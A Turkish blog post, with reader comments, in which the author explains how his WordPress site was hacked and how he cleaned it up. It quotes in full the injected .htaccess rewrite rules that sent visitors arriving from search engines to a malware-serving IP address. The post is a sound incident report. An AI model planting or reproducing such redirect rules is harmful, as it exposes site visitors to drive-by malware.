Hacklendik
Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda http://wordpress.org/support/topic/217700 Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen
yönlendirme kodu nedeni ile yaşamışım bu sorunları.
Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi.
Yukarıdaki linkdeki işlemleri tek tek yaptım
- htaccess dosyasını sildim.
- ftp şifremi değiştirdim
- hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim.
Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
Bu arada cute ftp’de htaccess görüntülemeyide öğrendik.
http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html
Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com’da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google’un bunu görüp sitemi kapatması. Google’un ve Firefox’un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim ve StopBadware.org’daki formuda doldurdum. Neyse hayırlısı bakalım.
Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.
Ek olarak
Ayrıca
http://www.fatihhayrioglu.com/?ref=siteAdi
gibi linkler var. Bunlarıda robots.txt
User-agent: *
Disallow: /*ref=*
Disallow: /*?ref=
kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google’un arama aracı nasıl buluyor.
Merhaba Hocam;
Çok iyi yapmışsınız, böyle yararlı bir sitenin hiç ziyaret etmeyenlerin daha ilk girişte üzerinde bırakacağı olumsuz etkiden kurtarmış olursunuz.
Her sabah ki gibi ofisime geldim ve blog tagında olan siteleri tek tek açmaya başladım ki sıra senin sitene geldiğinde zararlı içerik cevabını aldım. Hayırdır dedim. Hatta ekran görüntüsünü de aldım sana göndermek için ama sonra sen geldin ve üzerine konuştuk biraz.
Olay cidden çok ilginç geldi bana. Çözüm için tebrikler (affına sığınarak) çözüm anlatımı için de teşekkürler Fatih abi.
Dün girdiğimde böyle bir sorun yoktu bugün girdim çok şaşırdım.
Geçmiş olsun Fatih Abi. Hacklendik diye Rss okuyucumda görünce bir an panikledim. Ama Allah’tan halletmişsin. Büyük geçmiş olsun.
hangi wordpress versiyonunu kullandığınızı pek belli etmeyin. Wordpress güvenlik açısından pek de iyi bir yazılım sayılmaz. En azından bu şekilde “bir grup insanın” hedefinden çıkmış olursunuz.
kolay gelsin.
saat 00:52 itibari ile engelleme sona ermiş.
@türker,
sitenizi daha önce de görmüştüm ama şimdi biraz daha detaylı baktığımda wordpress üzerine kurulu olduğunu gördüm. Güvenli olmayan bir yazılımı kullanmak ve “bu güvenli değil” demek biraz çelişmek değil midir?
Hayır wp ile ilgili bildiğiniz farklı güvenlik açıkları varsa ve bunları kendi sitenizde kapattıysanız bunları bizimle de paylaşabilir misiniz?
Google Reader da ilgimi çeken başlıklara sırayla göz atıyordum. Firefox un sekme listesi baya bir dolmuştu. Derken Avast antivirüsüm uyarı vermeye başladı. Bir truva atı saldırısı olduğunu söylüyordu. Hayırdır inşallah dedim. Buna neyin sebep olduğunu anlamak başta zor oldu. Açık olan sitelerin hepsi wp bloguydu. Birkaç kez daha deneyince sorunu anladım. Kendi blogum için endişelendim. Geçmiş olsun. Düzeltmene sevindim.
sa,
bende rss’ten takip ediyorum sitenizi, o link geldi , birseyler yuklemek istedi. once kurdugum yeni bi program var mi ki ? o mu sebep oldu acep diyerek biraz bakindim .
sonrasinda yine google readerden baska linkleri actim , sorun yok , sizin postlarinizdan acmaya calistim , yine cikinca anladim .
sitenize direkt adres bardan girdim , sorun yoktu . size yaziyordum , bisiler oldu vb.. derken baska arkadaslar uyarmislar, simdi bende rahatladim , sorunun kaynagini bulmaniza da sevindim .
selamlar.
Dün o kadar ihtiyacım olduki bi konuda .. Tüm gün girmeye çalıştım.. Neyseki halletmişsiniz hocam.. Geçmiş olsun diyelim..